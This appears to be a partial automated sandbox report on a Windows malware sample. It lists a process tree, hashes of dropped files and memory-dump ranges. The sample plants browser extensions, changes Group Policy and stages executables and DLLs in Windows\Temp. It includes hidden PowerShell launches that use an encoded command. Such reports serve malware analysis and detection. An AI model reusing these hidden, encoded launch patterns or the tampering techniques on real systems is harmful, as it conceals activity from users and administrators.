C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "15399674129581737521042861921500112801-2883190051532969847111417167-44393725"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1387051356-37250866119915179071752079093-385439636-1859280129490180170-1672656120"1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11506006612063264842-1784380028820142983449390769115656462712690444621508552543"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1971409132-13177189281157861272-14178852896179857914807804751369398822-462611678"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-4817681361179295604-30141082513521144631738218983-406105617-1568903584-1800969418"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1725943594-1665174257-96755344513677333121316680722-3147467171384968177-299588405"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\OJLDvKxDU\rcGRmxA.xmlFilesize
2KB
MD517e173638e4701d828f598c218195623
SHA16bb6a73d4bc47ebb5de8bb961292a6a5eb7f7cb2
SHA25670825217b8cfacc54450ccb0dde447cc3b60f63be5a15bbd783740d284bc48d0
SHA512a06d4a240d6edff6605e78e0fda3966e53fee04a4f15504710cd7dd9768a9e9bbe8cdf40703e2e52ce3cc0da9db18f93196bf97118639b580e51a7fff0b50416
-
C:\Program Files (x86)\jDcnSjPvYahU2\zpZBKfZ.xmlFilesize
2KB
MD5d90842ad524fd9932ad3c87314910c37
SHA1bfd9fa39d56d6997457b79c6b6d0cd2ca3cfbae0
SHA256b5de176f46a979e5d41d212bb6bd9d5e23e736a5aec12f634dba2f49c0af0ee0
SHA512a159cc5675e00695679015b50bc2749ea98b58a3726efec12f2bd1a901e27ade5c65939647ffaf1ac325101bb093c5aecf0cfe2978f3296e1be438c6dc12ba91
-
C:\Program Files (x86)\qpZxqHvFKXpRC\OKtpDTB.xmlFilesize
2KB
MD578773674c8907e5a949e337b613cd68c
SHA1e9294cb42d8b0df33f6c25941dab942f2ac6bbe0
SHA256c6da47255445dab174ebe8e6afadf1c9439b82dfd56e652182ff80f80652439e
SHA512b47b31ce4e39c1d29984809db2b3f555d417b79135b015477eb405cd68e515d22e63f93975c9a18dbfa27ea917ad7fc33eff5f54e5cbc69796c745581e34f232
-
C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\pzUsmyw.xmlFilesize
2KB
MD5bc4da9db1229703426d8d7ed554a3c1b
SHA1992e102dab5b9afbe64d160bbe1e10f146b17bc4
SHA2564b865dba35a2062a3a5e565a9b97a1b5eb816532fdee0fefef96e81320bb5e0f
SHA5123b9f522919673d62725322869085d0e1bfa039a08bc7bc801441f4b3d8966c0548a4ada67543d0c910cb2882ada3ac196393a15889c0694d6ce4cb5b78bee95c
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5e43b6c1201e07a917913068b1668e43e
SHA197de06620982a7597e81d4e1a331bcb345dea29c
SHA256cacd6876d6019ffcdd9016e5336a50ef593160ff8a00fcf8ede977ec684bdf8c
SHA5129dad9a2231dac4fb595f01c6a3dc7e7f74d6a07d0ceb85557a86d427a16909d54e8d5b7adf35db4d6c2d13f1d2071b4739568d1160f5c1ba7e691e8edd28f738
-
C:\ProgramData\mMAjWdbxOIjSziVB\vusPJQT.xmlFilesize
2KB
MD5d89e652a4a62f6ecd0e61a301e261ea4
SHA1752573c48fd0491ced5fa71faadb89e12df34a1f
SHA256f0a5500073d7e04f61601d75559bf7f92139cdfd96e293d9a3b70b123bc5a4fc
SHA51296bc90cc2bdf906abd559fda0b3069e337be58fbcf9606b116adb9840eaa837f895e401efcc0bf98623bfef8260d3653296e55bf3e52d6f1bb9d183851166b23
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
9KB
MD558d7057664d78ed09e444b383dbd5695
SHA19acb7ab24b7fda4b0d09f2f88e3b203e8833db36
SHA2568acb1c3cc902c062624a8731109ee2e0182fa83a62c49a82bd2a86afa6e05f3c
SHA512589e9fd4ffbfe852104cd9b4e65956be8fb5f8ee224d88b9340866b73a7cdcc916ceb0e9df03482cdd57c138ad61e69e29988546c634b671272c0a1fffe087c9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
27KB
MD53e2a6039e2f583811f4e4347448d5b1e
SHA18e571561fa6e7ed53d10e3ff48db798f49172838
SHA25631731236aaabba4aa9720b79f1ffb8e9fb86af30042fd622a52174ea24c1a60c
SHA512763fdc8b489f1bdd294cebf94f31d32ea8466348568e0ee147a956266b7875916c3176c17116c1b07573153e0c92223e75b525fd97c4e603ea3c31696222df66
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD590fee9edf9eef8bbf94229509d9c8e09
SHA16eae72f2ffd0706e5a4e64410a4e21acc6a7b207
SHA25689b1fcb3120d4bc67f3e9e863d0d56caef5065eb6207539e43a0c3409db3516d
SHA512784d66ea2597969b86ba001b444ff84faf888632fcb31484383645ff044a33831ec53234d02e929d53f05dd4d408f090a0bc85136ccc3891790897cd05a2ab31
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBD2UZ8K8Z2RL5N57FPW.tempFilesize
7KB
MD57e8871f9719e5948d98e09cc54725c06
SHA1813fb02591522e9bcaa153e9918790945bf75cef
SHA256e44a799f5464de40e0cb6d9f929a9081d15831b824ecfe3be93d87de3968a83a
SHA512642b03426c18b15440faff1a157b411479b0c346cc46daf80f72a24b4b48ec0729760cfb9ddcb2f8b4ad543cccac2748de18c6ce5af8e1136a1f41553b2cd8fb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gdoevwuq.default-release\prefs.jsFilesize
6KB
MD57a9eccd379b6ad588a1180444b9f276e
SHA17ae9c946cf1ae7d694e18ddc226fc4a3466b235f
SHA2564335263d77a43ac40e812a71e99049843e1d55557ed4cadc86623d6d31f8191c
SHA512703974ab1572684f3e527b7eac19d3f2aad3665e4a8dd7c97a8f4ab5dfebe4f8fa91a1a80563446d3d46754514185be5cc21ae162e808d00c627f6c07652a693
-
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LLZOGWO.exeFilesize
5.6MB
MD501348a0c493683e7bd7b900a09b99e64
SHA1d582f16978556e9ca29f242894127f968d13da39
SHA256fb4fcb4fbc83d5121ec5d99a36ad0573503651be62125ea454db05eaa70c41e4
SHA5124b45e3615e2573b371049472f83e39a74a06f39c67d81c5a60b6f4cfc91d0287f03441dfa9c9ee1c2cccefa1e6d7928a56486d1e03203c4be65683b57697e97e
-
C:\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dllFilesize
2.8MB
MD5754987fcf18e49d7d977bfdf5e3ab6be
SHA1df8d8c2b7d55829b7fcc460d08fc8d802dbabe1f
SHA25621409285626f96fc274add8d357190d1c42c7c7f298918899228a600511aba39
SHA5123d532785e3e22831e2fd87cd9144ec34a2f19aead187f3035db69af13813f5205eb051eaae153dc67f2226fc3ea86f96f1ed51bbe7b9154ee592cfe2788a3118
-
C:\Windows\Temp\heXdjphsLYtTYYrU\tguKzFKr\DdRzdOBRShhqSKqt.wsfFilesize
9KB
MD59544c6c55783352f11e93d6495bc182c
SHA1627f4e1231cc71d01341889df678d94ded84cb1f
SHA2568ba5b9fbc71738f6c9f017964fe7d58e5c8a6233a815b265c93efdc1d80c3f04
SHA5126daf168487cc96b870809088a69651cbd07631bf502f679b04beaa7b73f454bbeea659eb38f8c07b173b76325220af3190627d0bdd06ede0c458e7c7cbf160cc
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD595a215a013ec7fda96d90c00c7525ead
SHA17da1c1d554ab2bdd491467d5d0da5b958d9c157b
SHA256674c4c426a307341e9c73fa290b9d53475ce2c1e892d7d490c31e46e3bd09b0a
SHA512c75e077f916330715203143b63c4a3a08bf3734be14e65dc1a9bbf277d3e39d9e40901662174c8a5b6f8940daa2e7859ef83a37c8ea91d3b258535c4cf52366b
-
\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exeFilesize
6.6MB
MD5f8efb05b940b05fc74801b61b3c0f500
SHA18e3eb6d604f3552d48ebcb385fc2681716b172af
SHA25690c6b16de088ab3f5737bcb599bb9ffd69a28abd149ab986b7fe52ba8bb2f400
SHA512028ea55f06fbfb079673df19e6e6249e3a2107a3d5485586f8c18724bf0a6a996ea5a7e31721bed9f7bf677bbf789c596994601076c66676c92fbd3a94741fff
-
\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dllFilesize
5.8MB
MD5aac3510cb04e347033aa70f16129df64
SHA18ec1fa83f1e76cd377112aa9e0261ad07dbff523
SHA2569d88f9e96622422a5e57341db5a4757eb993827b077cfcc4d9e7b6abfec9b43a
SHA512edcf264d682220bb4192b0f71d343448b3841e85895b896e137830daf9eb0319c647de758a5409881b4dc60b63b7d9877fcc1c703a6bcae4cd4571bac71f2f0d
-
\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dllFilesize
5.9MB
MD548d2cea531f04a6e276cfe21c9405737
SHA15cd56423e07b1bda9b4dc7728befef113ee6a7ec
SHA25600418dd03ee38f132d180e6192cca6792c774556306b4522ca24667ee32ca4cf
SHA512b73789c1cb867d785890f8a4de961b48dfa74557a17e54bddf19fbe9f3d41de6e31e29b43d82804a637ec9a5b79d16b8f5cc1faaae5c212d19b3219aef862424
-
\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dllFilesize
5.4MB
MD5d0bb0040eb64d85ce40ba511b1130d4b
SHA18fb04d2088c9d482065fc6d84de15c7c252b5b30
SHA2565ffe3e16c808be8b5eb6c9baefccecff1e5de2af5534071790e6e49cc08eac06
SHA512b46c5bfe96b233a07119132abc1a8934a0ec8e14547410f37ee92aad5a5e652216b62b72a9ff32d4d0f18ab6a205c4867335dfb1d09716606c7037fbfd6fd519
-
memory/884-60-0x000007FEF4B40000-0x000007FEF54DD000-memory.dmpFilesize
9.6MB
-
memory/884-63-0x0000000002630000-0x00000000026B0000-memory.dmpFilesize
512KB
-
memory/884-64-0x000007FEF4B40000-0x000007FEF54DD000-memory.dmpFilesize
9.6MB
-
memory/884-61-0x0000000002630000-0x00000000026B0000-memory.dmpFilesize
512KB
-
memory/884-62-0x0000000002630000-0x00000000026B0000-memory.dmpFilesize
512KB
-
memory/884-57-0x000007FEF4B40000-0x000007FEF54DD000-memory.dmpFilesize
9.6MB
-
memory/884-59-0x0000000002630000-0x00000000026B0000-memory.dmpFilesize
512KB
-
memory/884-58-0x0000000001CE0000-0x0000000001CE8000-memory.dmpFilesize
32KB
-
memory/884-56-0x000000001B1D0000-0x000000001B4B2000-memory.dmpFilesize
2.9MB
-
memory/956-150-0x0000000008520000-0x0000000008582000-memory.dmpFilesize
392KB
-
memory/956-95-0x0000000010000000-0x00000000105D7000-memory.dmpFilesize
5.8MB
-
memory/956-347-0x0000000009750000-0x000000000981B000-memory.dmpFilesize
812KB
-
memory/956-333-0x00000000088C0000-0x0000000008944000-memory.dmpFilesize
528KB
-
memory/956-106-0x0000000007C60000-0x0000000007CE5000-memory.dmpFilesize
532KB
-
memory/1396-18-0x0000000010000000-0x00000000105D7000-memory.dmpFilesize
5.8MB
-
memory/1540-44-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1540-47-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmpFilesize
9.6MB
-
memory/1540-39-0x000000001B0A0000-0x000000001B382000-memory.dmpFilesize
2.9MB
-
memory/1540-40-0x00000000026A0000-0x00000000026A8000-memory.dmpFilesize
32KB
-
memory/1540-42-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1540-41-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmpFilesize
9.6MB
-
memory/1540-45-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1540-43-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmpFilesize
9.6MB
-
memory/1540-46-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1576-67-0x0000000073CC0000-0x000000007426B000-memory.dmpFilesize
5.7MB
-
memory/1576-69-0x0000000001250000-0x0000000001290000-memory.dmpFilesize
256KB
-
memory/1576-70-0x0000000073CC0000-0x000000007426B000-memory.dmpFilesize
5.7MB
-
memory/1576-68-0x0000000001250000-0x0000000001290000-memory.dmpFilesize
256KB
-
memory/1576-65-0x0000000073CC0000-0x000000007426B000-memory.dmpFilesize
5.7MB
-
memory/1576-66-0x0000000001250000-0x0000000001290000-memory.dmpFilesize
256KB
-
memory/1968-108-0x0000000073C50000-0x00000000741FB000-memory.dmpFilesize
5.7MB
-
memory/1968-120-0x0000000073C50000-0x00000000741FB000-memory.dmpFilesize
5.7MB
-
memory/1968-112-0x0000000073C50000-0x00000000741FB000-memory.dmpFilesize
5.7MB
-
memory/1968-113-0x00000000012A0000-0x00000000012E0000-memory.dmpFilesize
256KB
-
memory/1968-110-0x00000000012A0000-0x00000000012E0000-memory.dmpFilesize
256KB
-
memory/2512-23-0x0000000073280000-0x000000007382B000-memory.dmpFilesize
5.7MB
-
memory/2512-24-0x0000000002A30000-0x0000000002A70000-memory.dmpFilesize
256KB
-
memory/2512-27-0x0000000073280000-0x000000007382B000-memory.dmpFilesize
5.7MB
-
memory/2652-374-0x0000000001300000-0x00000000018D7000-memory.dmpFilesize
5.8MB
-
memory/2668-30-0x0000000010000000-0x00000000105D7000-memory.dmpFilesize
5.8MB
-
memory/2744-84-0x000007FEF56E0000-0x000007FEF607D000-memory.dmpFilesize
9.6MB
-
memory/2744-88-0x00000000027F0000-0x0000000002870000-memory.dmpFilesize
512KB
-
memory/2744-87-0x00000000027F0000-0x0000000002870000-memory.dmpFilesize
512KB
-
memory/2744-85-0x00000000027F0000-0x0000000002870000-memory.dmpFilesize
512KB
-
memory/2744-86-0x000007FEF56E0000-0x000007FEF607D000-memory.dmpFilesize
9.6MB
-
memory/2744-90-0x000007FEF56E0000-0x000007FEF607D000-memory.dmpFilesize
9.6MB
-
memory/2744-89-0x00000000027F0000-0x0000000002870000-memory.dmpFilesize
512KB
-
memory/2788-129-0x0000000073D20000-0x00000000742CB000-memory.dmpFilesize
5.7MB
-
memory/2788-136-0x0000000001120000-0x0000000001160000-memory.dmpFilesize
256KB
-
memory/2788-139-0x0000000073D20000-0x00000000742CB000-memory.dmpFilesize
5.7MB
-
memory/2788-135-0x0000000001120000-0x0000000001160000-memory.dmpFilesize
256KB
-
memory/2788-130-0x0000000001120000-0x0000000001160000-memory.dmpFilesize
256KB
-
memory/2788-131-0x0000000073D20000-0x00000000742CB000-memory.dmpFilesize
5.7MB